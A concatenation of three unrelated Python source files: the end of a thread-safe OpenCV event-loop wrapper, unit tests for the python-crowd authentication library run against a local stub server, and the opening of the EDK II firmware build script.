        add_key_listener(self._on_key)

    def _on_key(self, c: Optional[int]) -> None:
        """Called on key press.

        Args:
          c: the key that was pressed. None if the iterator is stopping.
        """
        if c is None:
            # None is the producer's stop sentinel.
            self._stopped = True
        if self._stopped:
            # Wake any blocked __next__ so it can raise StopIteration.
            with self._lock:
                self._event.set()
            return
        with self._lock:
            self._event.set()
            assert c is not None  # To appease pytype.
            self._keys.append(c)

    def __iter__(self) -> '_KeyIterator':
        return self

    def __next__(self) -> int:
        # Block until a key arrives, the timeout expires, or we are stopped.
        while True:
            try:
                if not self._event.wait(self._timeout):
                    # Timed out.
                    return -1
                break
            except KeyboardInterrupt:
                # Ctrl-C requests a global stop, then re-waits so the stop
                # signal set by _on_key(None) is observed.
                self._stop()
        with self._lock:
            if self._stopped:
                raise StopIteration()
            c = self._keys.popleft()
            if not self._keys:
                # Queue drained: require a fresh key before the next wake-up.
                self._event.clear()
            return c
class _SafeCv2:
    """Global thread-safe CV2 access object."""

    # Callbacks invoked for each new key; each receives None when stopping.
    _key_listeners: List[Callable[[Optional[int]], None]]
    # Queued (fn, args, kwargs) opencv calls to run on the event-loop thread.
    _command_queue: Deque[Tuple[Callable[..., None], Any, Any]]
    # False once a stop has been processed by the event loop.
    _running: bool
    # The thread that runs the cv2 event loop (_run).
    _thread: threading.Thread

    def __init__(self) -> None:
        """Initialize the object."""
        # Methods to be called on a new key. Currently used internally for
        # key_iterator(). The method gets a None when the event loop ends.
        self._key_listeners = []
        # OpenCV function calls to be processed.
        self._command_queue = collections.deque()
        # Used to request the thread to stop.
        self._running = True
        # Run the event loop on a dedicated thread so callers never have to
        # own the cv2.waitKey() pump themselves.
        self._thread = threading.Thread(target=self._run)
        self._thread.start()

    def call(self, fn: Callable[..., None], *args: Any, **kwargs: Any) -> None:
        """Queues an opencv method to be called.

        Note that the method will not be called immediately. If the args change by
        the time the method is called, it will use the modified arguments.

        Args:
          fn: An opencv function, e.g. cv2.namedWindow
          *args: Arguments to the method.
          **kwargs: Keyword args.
        """
        self._command_queue.append((fn, args, kwargs))

    def stop(self) -> None:
        """Stop the iterators."""
        # Route the stop through the command queue so it executes on the
        # event-loop thread, like every other cv2 call.
        self._command_queue.append((self._stop, [], {}))

    def _add_key_listener(self, listener: Callable[[Optional[int]],
                                                   None]) -> None:
        """Add a key listener.

        Args:
          listener: the listener.
        """
        if not self._running:
            # Already stopped: deliver the stop sentinel immediately so a new
            # iterator terminates instead of waiting forever.
            listener(None)
        else:
            self._key_listeners.append(listener)

    def key_iterator(self, timeout_secs: Optional[float] = None) -> _KeyIterator:
        """Iterates keys.

        Does not generate -1.
        Multiple threads can use it if needed.

        Args:
          timeout_secs: How long to wait for key press in seconds. If None, will
            wait indefinitely. Will yield -1 whenever it times out.

        Returns:
          the key iterator.
        """
        return _KeyIterator(self._add_key_listener, self._stop, timeout_secs)

    def _stop(self) -> None:
        # Runs on the event-loop thread (queued by stop() or triggered by the
        # stop key); ends the loop and wakes every iterator with None.
        print('Stopping cv2 event loop.')
        self._running = False
        while self._key_listeners:
            listener = self._key_listeners.pop()
            listener(None)
        cv2.destroyAllWindows()

    def _run(self) -> None:
        """Run the openCV event loop."""
        while True:
            c = None
            try:
                # Pump the cv2 UI; waitKey returns -1 when no key was pressed.
                c = cv2.waitKey(_CV2_EVENTLOOP_MS)
            except KeyboardInterrupt:
                # Treat Ctrl-C like pressing the stop key.
                c = _STOP_KEY
            if not self._running:
                break
            if c != -1:
                # Fan the key out to every registered listener.
                for handler in self._key_listeners:
                    handler(c)
            # Drain queued cv2 calls on this (UI) thread.
            while self._command_queue:
                fn, args, kwargs = self._command_queue.popleft()
                fn(*args, **kwargs)
            if c == _STOP_KEY:
                self._stop()
# Singleton instance.
_INSTANCE: Optional[_SafeCv2] = None
# Guards lazy creation of _INSTANCE.  Without it, two threads racing through
# get_instance() could each construct a _SafeCv2, spawning two competing
# cv2 event-loop threads.
_INSTANCE_LOCK = threading.Lock()


def get_instance() -> _SafeCv2:
    """Lazy initializes instance, and returns it.

    Thread-safe: uses double-checked locking so the common (already
    initialized) path stays lock-free while initialization happens at
    most once.
    """
    global _INSTANCE  # pylint: disable=global-statement
    if _INSTANCE is None:
        with _INSTANCE_LOCK:
            if _INSTANCE is None:
                _INSTANCE = _SafeCv2()
    return _INSTANCE
|
unittests.py | # vim: set fileencoding=utf-8 :
# Copyright 2012 Alexander Else <aelse@else.id.au>.
#
# This file is part of the python-crowd library.
#
# python-crowd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-crowd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-crowd. If not, see <http://www.gnu.org/licenses/>.
import sys
sys.path.append('..')
import unittest
import crowd
import crowdserverstub
import requests, threading
import random, time
# Use a random port so repeated or parallel test runs don't collide on bind.
PORT = random.randint(8000, 8020)
print("Port {0}".format(PORT))
# Application (service) credentials registered with the stub Crowd server.
APP_USER = 'testapp'
APP_PASS = 'testpass'
# End-user credentials registered with the stub Crowd server.
USER = 'user1'
PASS = 'pass1'
# Group name used by the group-membership tests.
GROUP = 'group1'
class testCrowdAuth(unittest.TestCase):
    """Test Crowd authentication.

    Runs against an in-process stub Crowd server (crowdserverstub) started on
    a background thread in setUpClass.

    Fixes applied: the deprecated unittest aliases ``assertEquals`` and
    ``assertRaisesRegexp`` (removed in Python 3.12) are replaced by
    ``assertEqual`` / ``assertRaisesRegex``, and unused ``result =``
    assignments inside the expected-failure closures are dropped.
    """

    @classmethod
    def setUpClass(cls):
        """Start the stub Crowd server and register the test app and user."""
        cls.base_url = 'http://localhost:%d' % PORT
        cls.crowd = crowd.CrowdServer(cls.base_url, APP_USER, APP_PASS)
        cls.server_thread = threading.Thread(
            target=crowdserverstub.run_server, args=(PORT,))
        cls.server_thread.start()
        crowdserverstub.add_app(APP_USER, APP_PASS)
        crowdserverstub.add_user(USER, PASS)
        # There is a race to start the HTTP server before
        # the unit tests begin hitting it. Sleep briefly
        time.sleep(0.2)

    @classmethod
    def tearDownClass(cls):
        """Ask the stub server to exit and wait for its thread to finish."""
        requests.get(cls.base_url + '/terminate')
        cls.server_thread.join()

    def testStubUserExists(self):
        """Check that server stub recognises user"""
        result = crowdserverstub.user_exists(USER)
        self.assertTrue(result)

    def testStubUserDoesNotExist(self):
        """Check that server stub does not know invalid user"""
        result = crowdserverstub.user_exists('fakeuser')
        self.assertFalse(result)

    def testStubCheckUserAuth(self):
        """Check that server stub auths our user/pass combination"""
        result = crowdserverstub.check_user_auth(USER, PASS)
        self.assertTrue(result)

    def testCrowdObjectSSLVerifyTrue(self):
        """Check can create Crowd object with ssl_verify=True"""
        c = crowd.CrowdServer("http://bogus", APP_USER, APP_PASS, ssl_verify=True)
        self.assertIsInstance(c, crowd.CrowdServer)

    def testCrowdObjectSSLVerifyFalse(self):
        """Check can create Crowd object with ssl_verify=False"""
        c = crowd.CrowdServer("http://bogus", APP_USER, APP_PASS, ssl_verify=False)
        self.assertIsInstance(c, crowd.CrowdServer)

    def testAuthAppValid(self):
        """Application may authenticate with valid credentials"""
        result = self.crowd.auth_ping()
        self.assertTrue(result)

    def testAuthAppInvalid(self):
        """Application may not authenticate with invalid credentials"""
        c = crowd.CrowdServer(self.base_url, 'invalidapp', 'xxxxx')
        result = c.auth_ping()
        self.assertFalse(result)

    def testAuthUserValid(self):
        """User may authenticate with valid credentials"""
        result = self.crowd.auth_user(USER, PASS)
        self.assertIsInstance(result, dict)

    def testAuthUserInvalidUser(self):
        """User may not authenticate with invalid username"""
        result = self.crowd.auth_user('invaliduser', 'xxxxx')
        self.assertIs(result, None)

    def testAuthUserInvalidPass(self):
        """User may not authenticate with invalid password"""
        result = self.crowd.auth_user(USER, 'xxxxx')
        self.assertIs(result, None)

    def testCreateSessionValidUser(self):
        """User may create a session with valid credentials"""
        result = self.crowd.get_session(USER, PASS)
        self.assertIsInstance(result, dict)

    def testCreateSessionInvalidUser(self):
        """User may not create a session with invalid username"""
        result = self.crowd.get_session('invaliduser', 'xxxxx')
        self.assertIs(result, None)

    def testCreateSessionInvalidPass(self):
        """User may not create a session with invalid password"""
        result = self.crowd.get_session(USER, 'xxxxx')
        self.assertIs(result, None)

    def testValidateSessionValidUser(self):
        """Validate a valid session token"""
        session = self.crowd.get_session(USER, PASS)
        token = session['token']
        result = self.crowd.validate_session(token)
        self.assertIsInstance(result, dict)

    def testValidateSessionInvalidToken(self):
        """Detect invalid session token"""
        token = '0' * 24
        result = self.crowd.validate_session(token)
        self.assertIs(result, None)

    def testValidateSessionValidUserUTF8(self):
        """Validate that the library handles UTF-8 in fields properly"""
        session = self.crowd.get_session(USER, PASS)
        token = session['token']
        result = self.crowd.validate_session(token)
        # assertEqual replaces the deprecated assertEquals alias.
        self.assertEqual(result['user']['email'], u'%s@does.not.ëxist' % USER)

    def testCreateSessionIdentical(self):
        """Sessions from same remote are identical"""
        session1 = self.crowd.get_session(USER, PASS, '192.168.99.99')
        session2 = self.crowd.get_session(USER, PASS, '192.168.99.99')
        self.assertEqual(session1, session2)

    def testCreateSessionMultiple(self):
        """User may create multiple sessions from different remote"""
        session1 = self.crowd.get_session(USER, PASS, '192.168.99.99')
        session2 = self.crowd.get_session(USER, PASS, '192.168.88.88')
        self.assertNotEqual(session1, session2)

    def testTerminateSessionValidToken(self):
        """Terminate a valid session token"""
        session = self.crowd.get_session(USER, PASS)
        token = session['token']
        result = self.crowd.terminate_session(token)
        self.assertTrue(result)

    def testTerminateSessionInvalidToken(self):
        """Terminating an unknown token returns None"""
        token = '0' * 24
        result = self.crowd.terminate_session(token)
        self.assertIs(result, None)

    def testGetGroupsNotEmpty(self):
        """get_groups reflects a direct group membership"""
        crowdserverstub.add_user_to_group(USER, GROUP)
        result = self.crowd.get_groups(USER)
        self.assertEqual(set(result), set([GROUP]))
        crowdserverstub.remove_user_from_group(USER, GROUP)

    def testGetNestedGroupsNotEmpty(self):
        """get_nested_groups reflects a direct group membership"""
        crowdserverstub.add_user_to_group(USER, GROUP)
        result = self.crowd.get_nested_groups(USER)
        self.assertEqual(set(result), set([GROUP]))
        crowdserverstub.remove_user_from_group(USER, GROUP)

    def testRemoveUserFromGroup(self):
        """Removing a user from a group empties their group list"""
        crowdserverstub.add_user_to_group(USER, GROUP)
        crowdserverstub.remove_user_from_group(USER, GROUP)
        result = self.crowd.get_groups(USER)
        self.assertEqual(set(result), set([]))

    def testGetNestedGroupUsersNotEmpty(self):
        """get_nested_group_users lists the group's members"""
        crowdserverstub.add_user_to_group(USER, GROUP)
        result = self.crowd.get_nested_group_users(GROUP)
        self.assertEqual(set(result), set([USER]))
        crowdserverstub.remove_user_from_group(USER, GROUP)

    def testUserExists(self):
        """user_exists is true for a registered user"""
        result = self.crowd.user_exists(USER)
        self.assertTrue(result)

    def testUserAttributesExist(self):
        """get_user always includes an 'attributes' key"""
        result = self.crowd.get_user(USER)
        self.assertIsNotNone(result)
        self.assertTrue('attributes' in result)

    def testUserAttributesReturned(self):
        """Custom attributes set at creation are returned by get_user"""
        crowdserverstub.add_user('attruser', 'mypass', {'something': True})
        result = self.crowd.get_user('attruser')
        self.assertIsNotNone(result)
        self.assertTrue('attributes' in result)
        self.assertTrue('something' in result['attributes'])

    def testUserCreationSuccess(self):
        """A new user can be created with email and password"""
        result = self.crowd.add_user('newuser',
                                     email='me@test.example',
                                     password='hello')
        self.assertTrue(result)

    def testUserCreationDuplicate(self):
        """Creating the same user twice fails the second time"""
        result = self.crowd.add_user('newuser1',
                                     email='me@test.example',
                                     password='hello')
        self.assertTrue(result)
        result = self.crowd.add_user('newuser1',
                                     email='me@test.example',
                                     password='hello')
        self.assertFalse(result)

    def testUserCreationMissingPassword(self):
        """Creating a user without a password raises ValueError"""
        def f():
            self.crowd.add_user('newuser2',
                                email='me@test.example')
        # assertRaisesRegex replaces the deprecated assertRaisesRegexp alias.
        self.assertRaisesRegex(ValueError, "missing password", f)

    def testUserCreationMissingEmail(self):
        """Creating a user without an email raises ValueError"""
        def f():
            self.crowd.add_user('newuser',
                                password='something')
        self.assertRaisesRegex(ValueError, "missing email", f)

    def testUserCreationInvalidParam(self):
        """Creating a user with an unknown keyword raises ValueError"""
        def f():
            self.crowd.add_user('newuser',
                                email='me@test.example',
                                password='hello',
                                invalid_param='bad argument')
        self.assertRaisesRegex(ValueError, "invalid argument .*", f)
if __name__ == "__main__":
unittest.main()
|
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
from io import BytesIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
import multiprocessing
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."

## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']

## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"

# Matches auto-generated temporary table names of the form "_1_2_deadbeef".
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
# Cache of temporary tables keyed by name.
# NOTE(review): populated elsewhere in this module — usage not visible here.
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
#   If the tool is found in any PATH directory (with any PATHEXT suffix on
#   Windows), True is returned; otherwise False is returned.
#
def IsToolInPath(tool):
    if 'PATHEXT' in os.environ:
        suffixes = os.environ['PATHEXT'].split(os.path.pathsep)
    else:
        suffixes = ('',)
    return any(
        os.path.exists(os.path.join(directory, tool + suffix))
        for directory in os.environ['PATH'].split(os.path.pathsep)
        for suffix in suffixes
    )
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
#   WORKSPACE           The directory all packages/platforms start from
#   EDK_TOOLS_PATH      The directory contains all tools needed by the build
#   PATH                $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
    # check WORKSPACE
    if "WORKSPACE" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="WORKSPACE")

    # Normalize case/separators so later prefix comparisons are reliable.
    WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
    if not os.path.exists(WorkspaceDir):
        EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
    elif ' ' in WorkspaceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
                        ExtraData=WorkspaceDir)
    os.environ["WORKSPACE"] = WorkspaceDir

    # set multiple workspace
    PackagesPath = os.getenv("PACKAGES_PATH")
    mws.setWs(WorkspaceDir, PackagesPath)
    if mws.PACKAGES_PATH:
        # Validate each extra workspace root the same way as WORKSPACE.
        for Path in mws.PACKAGES_PATH:
            if not os.path.exists(Path):
                EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
            elif ' ' in Path:
                EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)

    #
    # Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
    #
    # Default the legacy EDK-compatibility source trees to the ECP package
    # under the workspace when not explicitly provided.
    if "ECP_SOURCE" not in os.environ:
        os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
    if "EFI_SOURCE" not in os.environ:
        os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
    if "EDK_SOURCE" not in os.environ:
        os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]

    #
    # Unify case of characters on case-insensitive systems
    #
    EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
    EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
    EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))

    os.environ["EFI_SOURCE"] = EfiSourceDir
    os.environ["EDK_SOURCE"] = EdkSourceDir
    os.environ["ECP_SOURCE"] = EcpSourceDir
    os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])

    # Missing legacy trees are only a warning (verbose), not an error:
    # Edk modules simply cannot be built in that case.
    if not os.path.exists(EcpSourceDir):
        EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
    elif ' ' in EcpSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
                        ExtraData=EcpSourceDir)
    if not os.path.exists(EdkSourceDir):
        if EdkSourceDir == EcpSourceDir:
            EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
        else:
            EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
                            ExtraData=EdkSourceDir)
    elif ' ' in EdkSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
                        ExtraData=EdkSourceDir)
    if not os.path.exists(EfiSourceDir):
        if EfiSourceDir == EcpSourceDir:
            EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
        else:
            EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
                            ExtraData=EfiSourceDir)
    elif ' ' in EfiSourceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
                        ExtraData=EfiSourceDir)

    # check those variables on single workspace case
    if not PackagesPath:
        # change absolute path to relative path to WORKSPACE
        # (prefix comparison relies on the normcase() normalization above)
        if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
            EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
                            ExtraData="WORKSPACE = %s\n    EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
        if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
            EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
                            ExtraData="WORKSPACE = %s\n    EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
        if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
            EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
                            ExtraData="WORKSPACE = %s\n    ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))

    # check EDK_TOOLS_PATH
    if "EDK_TOOLS_PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="EDK_TOOLS_PATH")

    # check PATH
    if "PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="PATH")

    # Publish the validated paths to the build-wide global state.
    GlobalData.gWorkspace = WorkspaceDir
    GlobalData.gEfiSource = EfiSourceDir
    GlobalData.gEdkSource = EdkSourceDir
    GlobalData.gEcpSource = EcpSourceDir

    GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
    GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
    GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
    GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
    GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
#   @param      FilePath      File path to be normalized
#   @param      Workspace     Workspace path which the FilePath will be checked against
#
#   @retval string            The normalized file path
#
def NormFile(FilePath, Workspace):
    # Resolve to an absolute, normalized path; relative paths are taken as
    # relative to the (possibly multi-root) workspace.
    if os.path.isabs(FilePath):
        FileFullPath = os.path.normpath(FilePath)
    else:
        FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
        Workspace = mws.getWs(Workspace, FilePath)

    # The file must exist; otherwise abort the build with a helpful hint.
    if not os.path.isfile(FileFullPath):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)

    # Strip the workspace prefix, accounting for a possible trailing slash.
    prefix_len = len(Workspace) if Workspace[-1] in ["\\", "/"] else len(Workspace) + 1
    return FileFullPath[prefix_len:]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
#   @param      From            The stream message read from
#   @param      To              The stream message put on
#   @param      ExitFlag        The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
    # Pump lines from the stream into the sink until EOF, or until the
    # caller signals shutdown through ExitFlag (a threading.Event).
    while True:
        # read one line at a time
        Line = From.readline()
        # empty string means "end" (EOF on the pipe)
        if Line is not None and Line != "":
            To(Line.rstrip())
        else:
            break
        # is_set() replaces the camelCase isSet() alias, which is deprecated
        # in Python 3.10 and removed later; is_set() exists since Python 2.6,
        # so Python 2 compatibility is preserved.
        if ExitFlag.is_set():
            break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to do the
# redirection work.
#
#   @param  Command             A list or string containing the call of the program
#   @param  WorkingDir          The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
    # Returns a string like "1234ms" — the wall-clock duration of the command.
    BeginTime = time.time()
    # if working directory doesn't exist, Popen() will raise an exception
    if not os.path.isdir(WorkingDir):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)

    # Command is used as the first Argument in following Popen().
    # It could be a string or sequence. We find that if command is a string in following Popen(),
    # ubuntu may fail with an error message that the command is not found.
    # So here we may need convert command from string to list instance.
    if platform.system() != 'Windows':
        if not isinstance(Command, list):
            Command = Command.split()
        # NOTE(review): joined back to a string because shell=True is used
        # below; with shell=True a string command is the portable form.
        Command = ' '.join(Command)

    Proc = None
    EndOfProcedure = None
    try:
        # launch the command
        Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)

        # launch two threads to read the STDOUT and STDERR
        # (one reader per pipe avoids the classic Popen dead-lock when a
        # single thread drains both pipes)
        EndOfProcedure = Event()
        EndOfProcedure.clear()
        if Proc.stdout:
            # NOTE(review): setName/setDaemon are deprecated camelCase
            # aliases in modern Python 3 (use name=/daemon=).
            StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
            StdOutThread.setName("STDOUT-Redirector")
            StdOutThread.setDaemon(False)
            StdOutThread.start()

        if Proc.stderr:
            StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
            StdErrThread.setName("STDERR-Redirector")
            StdErrThread.setDaemon(False)
            StdErrThread.start()

        # waiting for program exit
        Proc.wait()
    except: # in case of aborting
        # terminate the threads redirecting the program output
        # (bare except is deliberate here: even KeyboardInterrupt must stop
        # the redirector threads before re-reporting the failure)
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        if EndOfProcedure is not None:
            EndOfProcedure.set()
        if Proc is None:
            if not isinstance(Command, type("")):
                Command = " ".join(Command)
            EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))

    if Proc.stdout:
        StdOutThread.join()
    if Proc.stderr:
        StdErrThread.join()

    # check the return code of the program
    if Proc.returncode != 0:
        if not isinstance(Command, type("")):
            Command = " ".join(Command)
        # print out the Response file and its content when make failure
        RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
        if os.path.isfile(RespFile):
            f = open(RespFile)
            RespContent = f.read()
            f.close()
            EdkLogger.info(RespContent)

        EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
    return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
    ## The constructor
    #
    #   @param  self        The object pointer
    #   @param  Obj         The object the build is working on
    #   @param  Target      The build target name, one of gSupportedTarget
    #   @param  Dependency  The BuildUnit(s) which must be completed in advance
    #   @param  WorkingDir  The directory build command starts in
    #
    def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
        self.BuildObject = Obj
        self.Dependency = Dependency
        self.WorkingDir = WorkingDir
        self.Target = Target
        self.BuildCommand = BuildCommand
        if not BuildCommand:
            # Abort early: without a make command this unit can never build.
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                                (Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
                            ExtraData=str(Obj))

    ## str() method
    #
    #   It just returns the string representation of self.BuildObject
    #
    #   @param  self        The object pointer
    #
    def __str__(self):
        return str(self.BuildObject)

    ## "==" operator method
    #
    #   It just compares self.BuildObject with "Other". So self.BuildObject must
    #   provide its own __eq__() method.
    #
    #   @param  self        The object pointer
    #   @param  Other       The other BuildUnit object compared to
    #
    def __eq__(self, Other):
        # Units are equal only for the same build object AND the same
        # architecture (one module may build for several arches).
        return Other and self.BuildObject == Other.BuildObject \
                and Other.BuildObject \
                and self.BuildObject.Arch == Other.BuildObject.Arch

    ## hash() method
    #
    #   It just returns the hash value of self.BuildObject which must be hashable.
    #
    #   @param  self        The object pointer
    #
    def __hash__(self):
        # Kept consistent with __eq__: both the object and its Arch matter.
        return hash(self.BuildObject) + hash(self.BuildObject.Arch)

    def __repr__(self):
        return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
    ## Constructor: dependencies are the make units of the module's libraries.
    #
    #   @param  self        The object pointer
    #   @param  Obj         The ModuleAutoGen object the build is working on
    #   @param  Target      The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        lib_units = [ModuleMakeUnit(lib_autogen, Target) for lib_autogen in Obj.LibraryAutoGenList]
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, lib_units, Obj.MakeFileDir)
        # The default targets map to the module-level "tbuild" make target.
        if Target in (None, "", "all"):
            self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
    ## The constructor
    #
    #   @param  self        The object pointer
    #   @param  Obj         The PlatformAutoGen object the build is working on
    #   @param  Target      The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        # Bug fix: the original read self.BuildObject here, but that attribute
        # is only assigned inside BuildUnit.__init__ (called below), so every
        # construction raised AttributeError.  Use the Obj parameter directly.
        Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
        Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
    # queue for tasks waiting for schedule
    _PendingQueue = OrderedDict()
    _PendingQueueLock = threading.Lock()

    # queue for tasks ready for running
    _ReadyQueue = OrderedDict()
    _ReadyQueueLock = threading.Lock()

    # queue for run tasks
    _RunningQueue = OrderedDict()
